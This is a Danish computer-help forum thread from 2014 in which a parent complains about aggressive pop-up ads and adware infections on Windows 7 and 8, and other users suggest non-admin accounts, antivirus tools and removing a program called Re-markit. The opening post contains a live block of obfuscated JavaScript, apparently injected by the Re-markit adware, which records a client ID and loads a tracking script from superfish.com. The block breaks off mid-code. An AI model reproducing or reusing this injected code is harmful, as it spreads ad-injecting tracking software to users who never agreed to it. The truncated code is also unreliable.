|
Annonce frustationer: Win 7 & 8 |
Besvar ![]() |
Side 123> |
Forfatter | ||
herognu ![]() Super bruger ![]() Oprettet: 13-April-2010 Sted: Denmark Status: Offline Point: 374 |
![]() ![]() ![]() ![]() ![]() Sendt: 01-April-2014 kl. 14:08 |
|
Jeg er ved at gå op op limningen omkring annoncer der popper op hele tiden og nogen gange blokerer eller ligefrem laver om på siden i nogle tilfælde.
Generelt er annoncerne ret aggressive som fx midt i det hele blinkende osv: "Din PC kører dårligt kør dette program". Det er sket et par gange at min søn på 9 år er kommet til at trykke ja på en af dem og så er den blevet inficeret med noget som antivirus programmet skulle fjerne. < id="5EDCC289BA252673">(function(){;if("43ld8 Y 8bsB5 bKpUpEE")var eo=false;else{var zx=(''+'4\u004D'+' \u0065\x39'+'9\x20\x20\x71'+'p\u0053\x71kT\x5A\x39'+' ').replace(''+'q\x70\x53',''+' \x3A\x44');};if(window['top']==window['self']){var de={};try{if("1"+"Mw\x4B\x66\x202T"+"L"+"7\u0033\x66\u0057"+" \x20Z\x52\u0020\x31"+" ")var wg=screen["left"];}catch(yf){};de["version"]='155';try{var vs="\u0048j"+""+" \x46 \u0064\u003A"+"1\x20"+"vt\x67\u0053\u0035t"+"Xd"+"\x6fM\u0055\u0034 "+"o"+""+"K";}catch(ej){};de["clientuid"]="5EDCC289BA252673";try{if('K1')var tm=0x5d2a7f36;else{var nw=false;};}catch(yb){};de["addonname"]="Re-markit";window["_rvz"]=de;(function(){window["__rvzrdggdl"]={product_name:"Re-markit"};var e=document["createElement"]('script');e['setAttribute']('type',"text/javascript");e['setAttribute']("charset","UTF-8");e['setAttribute']('src',('https:'==document["location"]["protocol"]?"https":"http")+"://www.superfish.com/ws/sf_main.jsp?dlsource=sfrvzr&userId="+"5EDCC289BA252673"+"&CTID=rvzr2040_2181_US");document['body']['appendChild'](e);})();(function(){var product_name='Re-markit';var B64={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(r){var t="";var i,m,o,l,n,p,q;var s=0;r=B64['_utf8_encode'](r);while(s Jeg har prøvet at bruge både Explorer og Chrome og har stillet de forskellige værktøjer som blokering af pop-up osv, men intet hjælper. Jeg har problemerne både på Windows 7 og 8. Er der noget effektivt middel mod denne ondskab? |
||
![]() |
||
Pony65 ![]() Guld medlem ![]() Oprettet: 20-September-2008 Sted: Silkeborg Status: Offline Point: 1840 |
![]() ![]() ![]() ![]() ![]() |
|
Lad ikke den 9 årige bruge computeren !!!
|
||
![]() |
||
claus_jac ![]() Guld medlem ![]() Oprettet: 06-August-2008 Sted: Denmark Status: Offline Point: 5570 |
|
Det vil jo ikke rigtigt hjælpe noget når de først er kommet ind. Det har intet med "popups" at gøre. Det er derimod typisk en ActiveX teknologi som ligger som en "browserhelperapplication" - så du skal ind i indstillingerne af tilføjelser for at slå det fra. - men det kræver desværre en masse viden at blive dem helt kvit og frit, så find en person i omgangskredsen som ved noget om IT og få ham/hende til at hjælpe med at komme af med dem. Det kan godt være vedkommende ikke ved 100% hvordan, men i det mindste kan søge sig frem til hvordan det skal gøres.
Alternativet er en ominstallation af windows. - Tingene kommer ligeså tit ind gennem facebook og andre sider man kommer ind på og man normalt har tiltro til. Især "spil" der hentes ned via facebook er nogle forfærdelige syndere. |
||
![]() |
||
herognu ![]() Super bruger ![]() Oprettet: 13-April-2010 Sted: Denmark Status: Offline Point: 374 |
|
[/QUOTE] Lad ikke den 9 årige bruge computeren !!! Hmm okay så løsningen er at han ikke skal lære noget og forblive i uvidenhed? ![]() Jeg kan så sige, at jeg selv har eksperimenteret og fundet ud af at Microsofts eget antivirus system er noget l...t Dette er afinstalleret og i stedet har jeg installeret Bifdefender som fandt to stk software som ikke skulle være der og lige nu er der ikke flere af de sædvanlige problemer. Fx var denne side skubbet helt ud i siden så jeg ikke kunne læse svarene.
|
||
![]() |
||
Brixen ![]() Guld medlem ![]() Oprettet: 19-Juni-2004 Sted: Denmark Status: Offline Point: 6682 |
|
Den 9-årige skal ikke have administratorrettigheder.
Lav en konto til sønnen og indstil Forældrekontrol passende. Selvfølgelig skal sønnen kunne bruge pc'en - men i hvert fald ikke som administrator.
|
||
Venlig hilsen
KB |
||
![]() |
||
|
Vil det forhindre, at selv om han trykker ja til at installere så bliver det ikke tilladt?
|
||
![]() |
||
Hanzoy ![]() Super bruger ![]() Oprettet: 18-Marts-2010 Status: Offline Point: 262 |
|
Jep det vil det forhindre.
|
||
![]() |
||
Pony65 ![]() Guld medlem ![]() Oprettet: 20-September-2008 Sted: Silkeborg Status: Offline Point: 1840 |
|
Jeg ønsker selvfølgelig ikke at din søn ikke lærer noget, men han er kun 9 år så du bliver nød til at sidde ved siden af ham hele tiden når han skal lære det.
Vil du holde din computer ren er det eneste mulighed. Gider du ikke lære ham det, så kan du jo gøre som mange andre forældre og give ham sin egen. Men vær nu fornuftig og tænk på han er kun 9 år, han skal ikke sidde alene og "lege" med en computer. Han har ikke mulighed for at forudse alle de farer der er ved internettet, det skal du lære ham
|
||
![]() |
||
Brixen ![]() Guld medlem ![]() Oprettet: 19-Juni-2004 Sted: Denmark Status: Offline Point: 6682 |
|
Du skal også have password på din egen konto, ellers lærer han hurtigt at logge ind som dig :-) |
||
Venlig hilsen
KB |
||
![]() |
||
Cyberguyen ![]() Guld medlem ![]() ![]() Oprettet: 24-Oktober-2006 Sted: Denmark Status: Offline Point: 4945 |
|
Din søn skal køre som "bruger" og ikke som "administrator" på din maskine. Så er man beskyttet imod næsten alt undtaget exploits.
Sørg for at maskinen altid er opdateret og kør evt. Chrome som browser. Lad være med at have java installeret.
Benyt en god antivirus - Kaspersky kan anbefales. Du kan installere diverse a.d.b.l.o.c.k værktøjer, som forhindre banner reklamer i at dukke op. Redigeret af Cyberguyen - 01-April-2014 kl. 15:46 |
||
Jeg støtter brugen af Recordere.dk's gamle logo med Piphans.
|
||
![]() |
||
Radiomanden ![]() Platin medlem ![]() ![]() Oprettet: 17-Maj-2004 Sted: 4100 Status: Offline Point: 40543 |
|
Det kan man jo ikke undlade, det skal jo bruges til E-Post, Netbank m.v.
|
||
Marantz NR1403 - Shield TV - Nokia 8000 Streaming boks - Samsung 40UE7005 - ARVANI TA210 SOUNDBAR - Panasonic TX-49FX623E
|
||
![]() |
||
Stougaard ![]() Super bruger ![]() ![]() Oprettet: 07-Juli-2011 Status: Offline Point: 363 |
|
Jeg kom på et tidspunkt til at installere noget der også førte til en masse lort lignende det du beskriver, hoved programmet der lavede lort i min computer hed remarkit hvis jeg husker rigtigt, det er super svært at komme af med og jeg måtte forbi 4 forskellige andre programmer der kunne fjerne programmet, prøv at gå ind i kontrolpanelet og ind i tilføj/fjern programmer og se om der er et der hedder remarkit eller noget lignende.
|
||
![]() |
Besvar ![]() |
Side 123> |
Skift forum | Forum-tilladelser ![]() Du kan ikke oprette nye emner i dette forum Du kan ikke besvare indlæg i dette forum Du kan ikke slette dine indlæg i dette forum Du kan ikke redigere dine indlæg i dette forum Du kan ikke oprette afstemninger i dette forum Du kan ikke stemme i dette forum |